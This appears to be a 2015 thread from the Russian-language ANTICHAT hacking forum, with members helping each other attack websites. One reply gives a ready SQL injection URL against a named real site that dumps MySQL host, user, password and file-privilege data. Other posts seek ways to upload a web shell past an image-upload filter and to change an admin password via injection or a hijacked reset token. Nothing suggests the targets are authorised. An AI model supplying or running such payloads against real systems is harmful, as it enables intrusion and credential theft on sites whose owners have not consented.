ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.06.2015, 23:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
5534
Репутация:
0
|
|
|
|
|
|
06.06.2015, 00:10
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Название БД в которую обращаешься, должно быть в чистом виде
в вашем случае пример актуального запроса:
_ttp://actachemscand.dk/author.php?aid=1126+and+1=0+union+select+1,2,conca t_ws(0x3a,host,user,password,file_priv),4+from+mys ql.user+--+
|
|
|
06.06.2015, 02:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от Ravenous
Ravenous said:
↑
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например. данный плагин не работает на последних версиях FF, устанавливайте старую версию ( до 30, если не ошибаюсь), если хоитите пользоваться данным плагином и не искать альтернативу
|
|
|
|
06.06.2015, 03:15
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
приучайте себя работать с burp suite или аналогами. они передают данные как есть, без urlencode
|
|
|
|
06.06.2015, 12:10
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Filipp
Filipp said:
↑
Никто не подскажет, как можно залить шелл через самописный двигл, имеется спортанский набор: Загрузка файл JPG, PNG,GIF, и обычный HTML редактор. Пробовал пропихнуть шелл через картинку, ничего не получилось, картинка обрабатывается какой то php функцией, и не дает загружать любое другое расширение кроме выше описанных (Корректировка запроса не помогает, все равно срабатывает защита). Так же пробовал в гифку добовлять комментарий - результата 0. Так же в запросе я нашел местечко, куда сгружаются все заблокированные файлы, попробовал подставить, дало ошибку 403)) Так же заметил одну особенность, файлы загружается через SQL запрос. Может быть есть способы заливки шелла именно через HTML редактор, ведь туда что угодно впихнуть можно?
Сообщение от Mister_Bert0ni
Mister_Bert0ni said:
↑
Всем привет. Банальный вопрос:Если есть регистрация на сайте то значит сайт как то пишет регистрационные данные в базу.Но уязвимость sql в другом скрипте,например в index.php в параметре id.Так вот когда раскручиваешь скуль то оказывается что у current_user-а права только USAGE и подменить хэш админа он не может.Как так???? Получается что сайт записует данные от привелегирированого юзера?? вы про mysql?
|
|
|
|
06.06.2015, 15:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
|
|
|
|
06.06.2015, 15:42
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Mister_Bert0ni
Mister_Bert0ni said:
↑
Да mysql различает запросы на модификацию и выборку. в select нельзя сделать update
|
|
|
|
06.06.2015, 15:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Сообщение от yarbabin
yarbabin said:
↑
mysql различает запросы на модификацию и выборку. в select нельзя сделать update Нельзя, это факт. Но есть такая золотая штука как UNION. Можно закомментировать последующий запрос, и UNION'ом дать UPDATE. Такое возможно?
|
|
|
|
06.06.2015, 15:48
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Filipp
Filipp said:
↑
Нельзя, это факт. Но есть такая золотая штука как UNION. Можно закомментировать последующий запрос, и UNION'ом дать UPDATE. Такое возможно? нет. http://www.mysql.ru/docs/man/UNION.html
|
|
|
|
06.06.2015, 22:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
Сообщение от yarbabin
yarbabin said:
↑
mysql различает запросы на модификацию и выборку. в select нельзя сделать update если я првильно понял то при ввборке из базы я никак не смогу внедрить апдейт или инсерт?Смогу поменять пароль только если есть кнопка забыли пароль и я смогу вытянуть токен которыц отсылаеться на эмейл для сброса пароля?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
